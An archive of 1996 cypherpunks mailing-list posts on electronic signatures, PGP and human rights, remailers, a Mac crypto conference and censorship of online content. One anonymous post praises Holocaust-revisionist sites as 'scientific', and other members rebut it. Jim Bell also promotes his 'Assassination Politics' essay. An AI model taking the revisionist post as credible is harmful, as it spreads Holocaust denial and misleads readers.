		http://www.ustreas.gov/treasury/bureaus/sba/electro.html

The first paragraph reads:

--SNIP--
The Financial Management Service is implementing an Electronic
Certification System to permit fast, secure, and accurate transmission and
certification of payment data. The system has been approved by the General
Accounting Office for satisfying the signature certification requirements
of 31 U.S.C. 3325 and 3528. 
--SNIP--

Would anyone like to comment on what is being used to provide 
signatures?  

Reading on down a bit, we get to this:

--SNIP--

It uses a microcomputer to generate voucher schedules,
electronically certify the vouchers, and transmit them via a dial-up
telephone line to a mainframe host computer at the servicing Regional
Financial Center. 

The electronic certification process provides positive identification of
the certifying officer who authorizes the voucher for payment and ensures
the authenticity of the transmitted data. 

It also detects any deliberate or inadvertent manipulation, modification,
and loss of data between the time the voucher is certified in the Federal
Program Agency microcomputer and the time it is verified at the servicing
Regional Financial Center host computer.
--SNIP--

Comments?

-abc
                                      \             Alan B. Clegg
         Just because I can            \            Internet Staff
        does not mean I will.           \          gateway.com, inc.
                                         \     <http://www.gateway.com/>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 Mar 1996 22:39:35 +0800
To: cypherpunks@toad.com
Subject: DEC_lan
Message-ID: <199603181356.IAA09520@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


NYT of 3-18-96 has front page story on Internet copyright 
issues, featuring copywebbing terrorist Declan.


DEC_lan







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Wed, 20 Mar 1996 03:22:41 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: InfoWarCon V 1996: Call For Papers
In-Reply-To: <Pine.SUN.3.91.960317032827.11248A-100000@polaris.mindport.net>
Message-ID: <Pine.SCO.3.91.960318091858.6327A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Mar 1996, Black Unicorn wrote:

> > >                   C A L L   F O R   P A P E R S 
> > >
> > >                          InfoWarCon 5, 1996
> > >           Fifth International Information Warfare Conference
> > >            "Dominating the Battlefields of Business and War"
> > >                         September 5-6, 1996
> > >                           Washington, DC
> > 
> > I'm wondering if I should bother re-writing my "Assassination Politics" 
> > essay into the form of a paper and submitting it to these people.  While it 
> > might nominally be considered right down their alley, from a subject 
> > standpoint, even a cursory look at the location (Washington, DC) and the 
> > invited people (large companies and military) suggest that my ideas would be 
> > just about as welcome as a yarmulke at a Nazi Party convention.
> 

I personally know Winn and several of the folks from NCSA.  You're stuff 
would be a FANTASTIC contribution, and I'm certain that it would be a 
popular session.  Yes, some of these folks are a bit "establishment," but 
they go to these things looking for new ideas, new perspectives, etc.

You sound like a guy who can hold his own in a debate, so I imagine 
you'll have no problems dealing with this crowd.  They may "challenge" 
your views, but you're not going to get attacked or anything.

BTW, I'm not one of the reviewers or organizers....

> > I'm not aware of the agenda (hidden or otherwise) of the sponsors, so 
> I don't know whether I should even bother.  Many people aren't 
> particularly appreciative of being "one-upped" (not to mention made 
> obsolete) so it's not clear that they'd give me the time of day. Any 
> ideas as to their receptiveness?

Don't read too much into this.  Last year, we had Eric Bloodaxe (Chris G) 
there, a host of, uh, shall we say "fringe" elements, and I think Eric 
Hughes was there (?Eric?  Sarah and I *think* we saw you there?), as well.
As far as an "agenda" other than the published one, I think you're probably 
being overly concerned.  It's actually a fun con and you'd be surprised 
the number of people willing to actively listen to anyone they even think 
might remotely be a "hacker."

If you show up trying to "one up" folks, however, you may not get what you 
want.  It's more of a cooperative, interactive forum;  Not a competition.

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Wed, 20 Mar 1996 01:52:27 +0800
To: "Alan B. Clegg" <abc@gateway.com>
Subject: Re: While browsing the IRS ("Electronic Certification")
In-Reply-To: <Pine.BSI.3.91.960318084035.337A-100000@black-ice.gateway.com>
Message-ID: <Pine.SCO.3.91.960318093421.6327B-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Mar 1996, Alan B. Clegg wrote:

They've been working on this for awhile.  The problem is that the 
certification setup does not scale well.  They've been looking at having 
the USPS maintain the certificates, but I have heard that it's been 
tossed back and forth between them and GSA and neither of them wants to 
do it.

IRT the actual crypto being used in the solution, they are using the 
Digitial Signature Standard (FIPS PUB 186) with message digests being 
created via the Secure Hash Algorithm (FIP PUB 180).  Unless you're using 
the FIPS stuff, you'd be hard pressed to get GAO or OMB to approve it.

> --SNIP--
> The Financial Management Service is implementing an Electronic
> Certification System to permit fast, secure, and accurate transmission and
> certification of payment data. The system has been approved by the General
> Accounting Office for satisfying the signature certification requirements
> of 31 U.S.C. 3325 and 3528. 
> --SNIP--
> 
> Would anyone like to comment on what is being used to provide 
> signatures?  
> 

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vinnie@webstuff.apple.com (vinnie moscaritolo)
Date: Wed, 20 Mar 1996 09:51:23 +0800
To: cypherpunks@toad.com
Subject: Mac Crypto Conference
Message-ID: <v02110108ad7366c19b23@[17.203.21.75]>
MIME-Version: 1.0
Content-Type: text/plain


hey all;

I am interested in putting together a Macintosh crypto conference for folks
who do or want to write crypto on the mac.  I was thinking about a one or
two day thing..real tech stuff. (not so much the users), but I am flexable.

  I plan to hold it here at apple, cupertino. (so as to make it real cheep)

 If you have any ideas on what you would like to see there, either drop me
an email, at <vinnie@webstuff.apple.com> or if you think it is worthy of a
public discussion reply at cypherpunks.

-------------
Vinnie Moscaritolo
Apple DTS Sniper
"One Shot..One Kill"

http://webstuff.apple.com/~vinnie/

Fingerprint =  4F A3 29 81 50 E4 04 F2  78 25 01 87 6E A2 14 6A
--------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M. Hallam-Baker" <hallam@w3.org>
Date: Tue, 19 Mar 1996 22:03:13 +0800
To: cypherpunks@toad.com
Subject: Re: Judge blocks French ISPs from connecting to revisionist sites
Message-ID: <199603181651.LAA26358@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[Various holocaust revisionist crap deleted]

Don't worry, it will very soon become impossible to block access to
anything on the Web. I have a long record of opposing the holocaust
revisionists. I have never attempted to prevent them putting their
views forward. It is better to expose them and their lies. Winston
Smith, Faust and co disappeared after we proved that they were the 
creations of one Dan Gannon. Attempting to cut off access and the 
conceit that the truth needs to be legislated merely plays into the 
facists hands.

Any attempt to cut of service can be circumvented simply by connecting
to a cache. Hensa in the UK (www.hensa.co.uk ?) run a very large one.
There are also many caches run by US universities although for obvious
reasons it is preferable for the French to go through a European one.

And please, no more anonymous posts trying to persuade us that there
is anything worth reading at these hate sites. The literary style
is familiar enough that nobody should be fooled. 


	Phill
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMU2UhSoZzwIn1bdtAQFuqAGAxBfCOiZ1LKPIXLdE7OAJnabXlv1rxShW
bW7DwF16+4rjLdm9ZahdS/X0NAMS1Oum
=ySHM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip Zimmermann <prz@acm.org>
Date: Wed, 20 Mar 1996 19:57:14 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: PGP and Human Rights
Message-ID: <199603181901.TAA04161@maalox>
MIME-Version: 1.0
Content-Type: text


Recently, I received the following letters by email from Central Europe.
The letters provides food for thought in our public debates over the role
of cryptography in the relationship between a government and its people.
With the sender's permission, I am releasing the letters to the public,
with the sender's name deleted, and some minor typos corrected.
This material may be reposted, unmodified, to any other Usenet newsgroups
that may be interested.

  -Philip Zimmermann


Date: Sat, 09 Mar 1996 19:33:00 +0000 (GMT)
>From: [name and email address deleted] 
Subject: Thanks from Central Europe
To: Philip Zimmermann <prz@ACM.ORG>

Dear Phil,

This is a short note to say a very big thank you for all your work with 
PGP.

We are part of a network of not-for-profit agencies, working among other 
things for human rights in the Balkans.  Our various offices have been 
raided by various police forces looking for evidence of spying or 
subversive activities.  Our mail has been regularly tampered with and our 
office in Romania has a constant wiretap.

Last year in Zagreb, the security police raided our office and 
confiscated our computers in the hope of retrieving information about the 
identity of people who had complained about their activites.

In every instance PGP has allowed us to communicate and protect 
our files from any attempt to gain access to our material as we PKZIP 
all our files and then use PGP's conventional encryption facility to 
protect all sensitive files.

Without PGP we would not be able to function and protect our client 
group.  Thanks to PGP I can sleep at night knowing that no amount of 
prying will compromise our clients.

I have even had 13 days in prison for not revealing our PGP pass phrases,
but it was a very small price to pay for protecting our clients.

I have always meant to write and thank you, and now I am finally doing 
it.  PGP has a value beyond all words and my personal gratitude to you is 
immense.  Your work protects the innocent and the weak, and as such 
promotes peace and justice, quite frankly you deserve the biggest medal 
that can be found. 

Please be encouraged that PGP is a considerable benefit people in need, 
and your work is appreciated.

Could you please tell us where in Europe we can find someone who can 
tell us more about using PGP and upgrades etc.  If you can't tell us 
these details because of the export restriction thing, can you point us 
at someone who could tell us something without compromising you.

Many thanks.
---

  [ I sent him a response and asked him if I could disclose his inspiring
    letter to the press, and also possibly use it in our ongoing
    legislative debates regarding cryptography if the opportunity arises
    to make arguments in front of a Congressional committee.  I also
    asked him to supply some real examples of how PGP is used to protect
    human rights.  He wrote back that I can use his letters if I delete
    his organization's name "to protect the innocent".  Then he sent me
    the following letter.  --PRZ ]


Date: Mon, 18 Mar 1996 15:32:00 +0000 (GMT)
>From: [name and email address deleted] 
Subject: More News from [Central Europe]
To: Philip Zimmermann <prz@ACM.ORG>

Dear Phil,

I have been thinking of specific events that might be of use to your 
Congressional presentation.  I am concerned that our brushes with 
Governments might be double-edged in that Congress might not like the 
idea of Human Rights groups avoiding Police investigation, even if such 
investigations violated Human Rights.

However we have one case where you could highlight the value of PGP to 
"Good" citizens, we were working with a young woman who was being 
pursued by Islamic extremists.  She was an ethnic Muslim from Albania who 
had converted to Christianity and as a result had been attacked, raped 
and threatened persistently with further attack.

We were helping to protect her from further attack by hiding her in 
Hungary, and eventually we helped her travel to Holland, while in 
Holland she sought asylum, which was granted after the Dutch Government 
acknowledged that she was directly threatened with rape, harrassment and 
even death should her whereabouts be known to her persecutors.

Two weeks before she was granted asylum, two armed men raided our office 
in Hungary looking for her, they tried to bring up files on our 
computers but were prevented from accessing her files by PGP.  They took 
copies of the files that they believed related to her, so any simple 
password or ordinary encryption would eventually have been overcome. 
They were prepared to take the whole computer if necessary so the only 
real line of defence was PGP.

Thanks to PGP her whereabouts and her life were protected.  This incident 
and the young woman's circumstances are well documented.

We have also had other incidents where PGP protected files and so 
protected innocent people.  If the US confirms the dubious precedent of 
denying privacy in a cavalier fashion by trying to deny people PGP , it 
will be used as a standard by which others will then engineer the 
outlawing of any privacy.  Partial privacy is no privacy.  Our privacy 
should not be by the grace and favour of any Government.  Mediums that 
ensured privacy in the past have been compromised by advances in 
technology, so it is only fair that they should be replaced by other 
secure methods of protecting our thoughts and ideas, as well as 
information.

I wish you well with your hearing.

Yours most sincerely

[name deleted]
---
[end of quoted material]

------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 20 Mar 1996 09:59:16 +0800
To: cypherpunks@toad.com
Subject: Re: Judge blocks French ISPs from connecting to revisionist sites
Message-ID: <199603182021.MAA08461@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


At 01:07 PM 3/18/96 +0100, Anonymous wrote:
>
>So that y'all can see what the fuss is about, try the following sites :

A far better site that is not being censored is:

http://members.aol.com/ironfrog/ubootwaffe/brown.html

>	Institute for Holocaust Revisionism
>	<a href="http://www.kaiwan.com/~ihrgreg">

This site is not blocked.

Greg Raven is a serious Neo-Nazi wacko who took over the IHR by force. The
police were called in to break up the fight, and the Nazis spent some time
suing each other for control. See the Willis Carto/IHR FAQ for alt.revisionism.

>	Committee for Open Debate On the Holocaust
>	<a href="http://www.valleynet.com/~brsmith/">

This site is not blocked.

The "censorship" page is full of events that never happened. Brian
acknowledges that the errors I pointed out are errors, but complains that he
"doesn't have time" to go back and correct them. He has had time, though, to
add more events that never happened. See the URL below [sic].

See also http://www.stormfront.org/, which has widely been reported to have
been "censored." It's not. That front page is just Don Black's idea of a
joke. See http://www.stormfront.org/stormfront/,
http://www2.stormfront.org/default.htm, and http://www3.stormfront.org/. The
Nazis are quite well-connected. IHR uses AOL because they *want* to be
censored so that they can play victim, and get more support from the
otherwise reasonable people here. Even Steve Case knows this, which is why,
uncharacteristically, he isn't booting them off.

-rich
 http://www.c2.org/~rich/Press/Swedish/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 18 Mar 1996 20:26:05 +0800
To: cypherpunks@toad.com
Subject: Re: Judge blocks French ISPs from connecting to revisionist sites
Message-ID: <199603181207.NAA11001@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



So that y'all can see what the fuss is about, try the following sites :

	Institute for Holocaust Revisionism
	<a href="http://www.kaiwan.com/~ihrgreg">

	Committee for Open Debate On the Holocaust
	<a href="http://www.valleynet.com/~brsmith/">

Theres a wealth of eye opening information there, not only about the
holocaust, but about freedom of speech, censorship, civil librerties,
hate groups, nazi hunters etc. etc.  The sites are noticeably empty
of "hate speech," and are in no way "denying the holocaust," but are
simply adopting a scientific approach to documenting the events of the
holocaust, seperating fact from fiction.

I was surprised - the authors of these sites come across as very sane
and open-minded, not the foaming at the mouth bigoted types that others
lead us to believe.

Anyone who seriously calls him(her)self open-minded should give these
sites a go - they certainly got me thinking.

The recent actions of the French and German governments make me feel
like I'm living in the middle ages.  I am truly disgusted at the
actions of such close minded people who have obviously not looked
at the sites involved.


Anon. (due to the emotional nature of this subject.)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 19 Mar 1996 23:36:39 +0800
To: cypherpunks@toad.com
Subject: 16B_uys
Message-ID: <199603181816.NAA18604@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   3-18-96. TWP:

   "FBI, CIA Try to Set Turf Rules as Bureau Branches Out."

      The growing FBI overseas contingent is establishing
      liaison relationships with foreign police and
      intelligence groups that already have relationships with
      CIA personnel. The FBI agents abroad also try to develop
      their own clandestine informants, sometimes recruiting
      individuals who work for the CIA or have been fired by
      it. At a gathering Feb. 3-4 in Davos, Switzerland, FBI
      Director Freeh met with six presidents, seven prime
      ministers and three foreign ministers.

   16B_uys












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 19 Mar 1996 23:49:29 +0800
To: Mark Aldrich <maldrich@grctechs.va.grci.com>
Subject: Re: InfoWarCon V 1996: Call For Papers
Message-ID: <m0tymPJ-0008xYC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:29 AM 3/18/96 -0500, Mark Aldrich wrote:

>I personally know Winn and several of the folks from NCSA.  You're stuff 
>would be a FANTASTIC contribution, and I'm certain that it would be a 
>popular session.  Yes, some of these folks are a bit "establishment," but 
>they go to these things looking for new ideas, new perspectives, etc.

Well, I've forwarded the essay as is.  If they really insist, I'd cut it 
down to a 1-2 page summary, but I suspect that if it catches their attention 
they won't mind reading the extra material.  

>You sound like a guy who can hold his own in a debate, so I imagine 
>you'll have no problems dealing with this crowd.  They may "challenge" 
>your views, but you're not going to get attacked or anything.

You're probably right, but some of the more perceptive ones may shit bricks 
when they discover what the stakes really are.  The REALLY perceptive ones 
will know that it doesn't make any difference, whether or not they like the 
idea or me, it's on the way.


>Don't read too much into this.  Last year, we had Eric Bloodaxe (Chris G) 
>there, a host of, uh, shall we say "fringe" elements, and I think Eric 
>Hughes was there (?Eric?  Sarah and I *think* we saw you there?), as well.
>As far as an "agenda" other than the published one, I think you're probably 
>being overly concerned.  It's actually a fun con and you'd be surprised 
>the number of people willing to actively listen to anyone they even think 
>might remotely be a "hacker."
>
>If you show up trying to "one up" folks, however, you may not get what you 
>want.  It's more of a cooperative, interactive forum;  Not a competition.

It's not that I'm trying to "one up" them; it might happen automatically.  
Let me give you a real-life example:  I first published the essay on 
FIDOnet, as well as list called "Digitaliberty," run by Bill Frezza.  
Frezza's list paradigm was to develop a way to enable the net to stay free 
in an unfree world; my idea had the prospect of not only making/keeping the 
net free, but also dragging the rest of the world into freedom whether it 
liked it or not.  (As well as eliminating war, governments, and a few other 
minor details.)   A few weeks after I started publicizing AP, the list went 
down for a few days and when it eventually returned, I was not among the 
subscribers and Frezza studiously ignored my inquiries.

As you can well imagine, Frezza's original idea was good, it was merely too 
limited and was overtaken by progress.  It would have been easier for him if 
he had opposed the fundamental concept of net freedom, or believed my 
position to be impractical or technically flawed.  As it was, there was 
nothing he could do.

Jim Bell
jimbell@pacifier.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 19 Mar 1996 13:58:47 +0800
To: cypherpunks@toad.com
Subject: Free Flight
Message-ID: <2.2.32.19960318185538.0073ff30@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


The latest Wired and last week's news reports covered the FAA decision to
sloooowly move from the current Positive Control ATC system to one called
Free Flight in which aircraft pick there own routes and separation is
maintained by GPS, computers, and telecommunications.  Collision avoidance
telecoms as opposed to collision avoidance radar.  Every plane knows where
it is in 4 dimensions (don't forget time) and knows its performance
capabilities.  They communicate with each other and the ground to keep away
from each other.

The question is why?

Why abandon a central command and control system with defined airways and
checkpoints, orders and acknowledgements?  Is this some sinister triumph by
free market ideology creeping into the ATC system as it did into New
Zealand's Labour Government of the 1980s or even into the Chinese Commies
brains?  Not quite.

It is simple.  The system was breaking down already even before the 40-50%
traffic growth projected over the next few years.  Even if the FAA weren't
totally incompetent as a computer buyer, a centralized system suffers from
real congestion problems as growth occurs.  Trying to cram more traffic down
fixed routes is a real problem.  Likewise finding enough commanders to seize
and hold the high points of the ATCS.  The change has been proposed because
the system would collapse without it.  Freedom is their only chance.

Note the same effect in the future as trade, travel, data flows, etc. double
and redouble.  At some point on the growth curve, free flight becomes the
only possibility.

DCF

"What *was* Vince Foster doing on November 22, 1963"?

   

  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Tue, 19 Mar 1996 23:35:20 +0800
To: jamesd@echeque.com
Subject: re: monsters et al
In-Reply-To: <199603181555.HAA23928@dns2.noc.best.net>
Message-ID: <Pine.SUN.3.91.960318141706.10766H-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Mar 1996 jamesd@echeque.com wrote:
> 
> The pernicious effects of censorship:  When you actually meet monsters,
> and see that they do not have horns and a tail, you falsely imagine 
> that they are not monsters.
> 

Very good point.

> 
> Those who defend totalitarianism, regardless of the brand name of 
> totalitarianism, simply lie.  It is as uncomplicated as that.


Not very good point.  

Monsters come in many hues and `totalitarianism' is rarely total.
Simplicity is in the mind of the beholder.

Charles Bell





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 20 Mar 1996 19:53:13 +0800
To: jya@pipeline.com>
Subject: Re: DEC_lan
In-Reply-To: <199603181356.IAA09520@pipe1.nyc.pipeline.com>
Message-ID: <glHPVja00YUxARV8tV@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 18-Mar-96 DEC_lan  by John
Young@pipeline.com 
> NYT of 3-18-96 has front page story on Internet copyright 
> issues, featuring copywebbing terrorist Declan.

Thanks -- I wasn't sure if the story ever was going to run, since Doreen
interviewed me for it a month ago.

In other news, a dozen volunteer net.translators are just about done
with the English version of _Le Grand Secret_. I expect it'll appear on
my web site <http://www.cs.cmu.edu/~declan/le-secret/> when complete.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Zambini <jlasser@rwd.goucher.edu>
Date: Wed, 20 Mar 1996 09:59:51 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: FORTUNE666 - AOL postings blamed for Iomega stock troubles (fwd)
Message-ID: <Pine.SUN.3.91.960318150218.22540E-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


An interesting question of reputations, plus a kneejerk reaction against 
anonymity...

"It must be true; I read it on AOL..."

Jon
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.

---------- Forwarded message ----------
Date: Sun, 17 Mar 96 23:42:34 
From: FringeWare Daily <email@fringeware.com>
Subject: FORTUNE666 - AOL postings blamed for Iomega stock troubles

Sent from: sentry@utxvms.cc.utexas.edu ()

This may be of interest to lovers and haters of chaos, alike-

>From Edupage:

IOMEGA STOCK VOLATILITY BLAMED ON AOL POSTINGS
Iomega, maker of high-capacity removable disk drives, is the focus of
controversy on America Online's Motley Fool bulletin board.  Company
officials have complained to the SEC that postings on Motley Fool and other
BBSs have contained false information and may be contributing to the
volatility of its stock.  Online exposure has "raised the visibility of some
stocks as well as the interest in those stocks," says an outside spokesman
for Iomega.  "At the same time, we're very concerned about how online
services can be used to attempt to drive stock prices higher or lower
through misinformation."  Postings about Iomega escalated to flaming and
physical threats last month, causing Motley Fool to pull some of the more
offensive ones, but critics of online BBSs note Iomega's problems are a
result of the practice of using "screen names" and the lack of verification
of information that's posted.  "You don't know if the person is a Ph.D. or
in Sing Sing," says one critic.  (Wall Street Journal 15 Mar 96 A5C)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vinnie@webstuff.apple.com (vinnie moscaritolo)
Date: Wed, 20 Mar 1996 09:58:57 +0800
To: mac-crypto@thumper.vmeng.com
Subject: RE: Mac Crypto Conference
Message-ID: <v0211010bad73a70ab3b8@[17.203.21.75]>
MIME-Version: 1.0
Content-Type: text/plain


hey all;

I setup a mac-crypto mailing list at  majordomo@thumper.vmeng.com
the ususal:

to: majordomo@thumper.vmeng.com
subscribe mac-crypto

will get you on board.

I't purpose is to discuss the specifics of macintosh based cryptography,
save the politics for cyhperpunks.


my first topic of discussion is the idea of a mac crypto conference, here
at apple, cupertino. I wsa thinking of a one day afair, a few sessions,
mostly tech, open to the developer public.


-------------
Vinnie Moscaritolo
Apple DTS Sniper
"One Shot..One Kill"

http://webstuff.apple.com/~vinnie/

Fingerprint =  4F A3 29 81 50 E4 04 F2  78 25 01 87 6E A2 14 6A
--------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 19 Mar 1996 23:54:54 +0800
To: cypherpunks@toad.com
Subject: "Physical Reality IV"
Message-ID: <2.2.32.19960318212013.0073ce80@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Bad Boys, Bad Boys
Whatcha gonna do? 
Whatcha gonna do when they come for you? 
Bad Boys, Bad Boys

repeat endlessly.

We did 4) two weeks ago.  Here are some more points.

5)  The Bad Boys must know where you are.

The general problem that Bad Boys face when policing cyberspace (and indeed
the whole modern marketplace) is that it is a "target poor" environment.  As
we saw in the last piece, the basic tactical reality is the force ratio that
can be applied to a territory.  How many bodies can you deploy per unit of
land to control it.  Even before you consider the size of the enemy force,
you have to consider the size of the territory.  This same calculus applies
equally to civilian law enforcement.

Another basic tactical problem is what von Clausewitz in "On War" called the
"fog of war."  This is the very great problem of knowing exactly where your
opponent is and what he is doing.

Note how computers can expand the "space" to be controlled.  Even before the
Internet became big, the problem can be seen in this excerpt from Sterling's
"Hacker Crackdown" (http://www.usfca.edu/crackdown/crack_6.html)

"About twenty-five boards vanished into police custody in May 1990. As we
have seen, there are an estimated 30,000 boards in America today. If we
assume that one board in a hundred is up to no good with codes and cards
(which rather flatters the honesty of the board-using community), then that
would leave 2,975 outlaw boards untouched by Sundevil. Sundevil seized about
one tenth of one percent of all computer bulletin boards in America. Seen
objectively, this is something less than a comprehensive assault."

Today, 30,000 web sites are created each month or so.  Just logging them is
hard much less ruling them.

The fact is that cyberspace is so vast, that it is very hard to make much of
a dent in it.  Policing territory is hard enough when you can see most of
it.  Any city cop or soldier doing house-to-house fighting can tell you that
crowded cities are harder to police than open territory.  Cyberspace has the
topography of madness.  Much of it is invisible and it grows changes and
deforms with the speed of the thoughts of the millions of its "residents."
And it has a doubling rate much faster than the doubling rate of "policing
hours" available to the would-be authorities.

Aside from sheer size and crazy topography, cyberspace can be very hard to
penetrate.  We on this list are well aware of the tools of obfuscation:
cryptography, false identities, remailers, proxies, etc.  An even bigger
factor are the features of our world that we as sophisticated users don't
even think about.  The strange nature of the place is hard for outsiders to
grasp.  The "locals" always have the strategic advantage of familiarity with
a territory.  The speed of technological change is also problem as is the
speed of "movement" within the system.   
 
Even if the opposition had the troopies to patrol the vast new territories
there are these frustrating "magical" qualities of cyberspace.  You block
one WWW site and its content in "teleported" within minutes to another site
half a world away.  You require your local ISPs to interpose a "Surfwatch"
interface between your captive citizenry and the free world and some of
those captives don the "invisible cape" of a proxy server to get at the
content they want.  Then there's the "force field" of crypto to block your
investigations.  None of these "magical" technologies are perfect they can
be defeated (sometimes) but defeating them takes resources.  And so far, the
Bad Boys haven't been winning too many in cyberspace.  

<More Tomorrow> 

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 19 Mar 1996 23:38:57 +0800
To: cypherpunks@toad.com
Subject: Re: Would the FTC crack down on snake oil someday?
In-Reply-To: <199603180455.XAA12434@unix.asb.com>
Message-ID: <Pine.LNX.3.91.960318163654.295A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 17 Mar 1996, Deranged Mutant wrote:

> Enclosed is an excerpt from Edupage. Snake-oil crypto popped into my 
> mind.... I wonder if the FTC (Federal Trade Commission... agency 
> *meant* to crack down on consumer fraud, for non-US readers here) 
> would ever get into act here.
> 
> Does the FTC have a home page? (Guess I'll do a search...)

http://www.ftc.gov .

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMU3YuLZc+sv5siulAQFtOAP/TiodS2MtG1Zz6L5aCq2xVU34/xaSOB6H
t/xcfxOyfUdWOmxAwUMYZiSsZqS1jVNvcrnNIqdL2cXMhGME5KpOqnOnCe9lg5JB
kQ9cJnZVLnq904nF9ZrS1bI+dhiKblYJf92y3q7A+gD4PS89MF2UCRBPJ4MD9rlF
rlfw4nID9ns=
=kwhB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Wed, 20 Mar 1996 19:50:52 +0800
To: cypherpunks@toad.com
Subject: Win95 Remailer update
Message-ID: <2.2.32.19960318113410.00679d98@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've generated a full installation package for RemailerBot, so that it now includes all required .DLLs, .OCXs, et al. Also includes the source code.

It replaces the remailer.zip available through my web page.

Simply unzip it to the directory of your choice, and run the setup132.exe file. Alternatively, you can use the MS expand utility to uncompress selective files.

"We apologize for the inconvenience"

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMU0tz8VrTvyYOzAZAQGS7QQArcKCBJKrzv9X/qZTaGGoPb1/46LKCKfe
hehMiGlc50llJ/J5EqH86CPsGhX2W3DgUE+G/IPG+hD7HLCMrc06dDcO5XkO1Y+9
FNhCkmeA/XhoiDF61cjZ8IWO5oZx0iKsHFBhd4WhkirVRyGREXnveQA0txZmH1JA
shzfa1XwqHo=
=3gkt
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: enquirer@alpha.c2.org
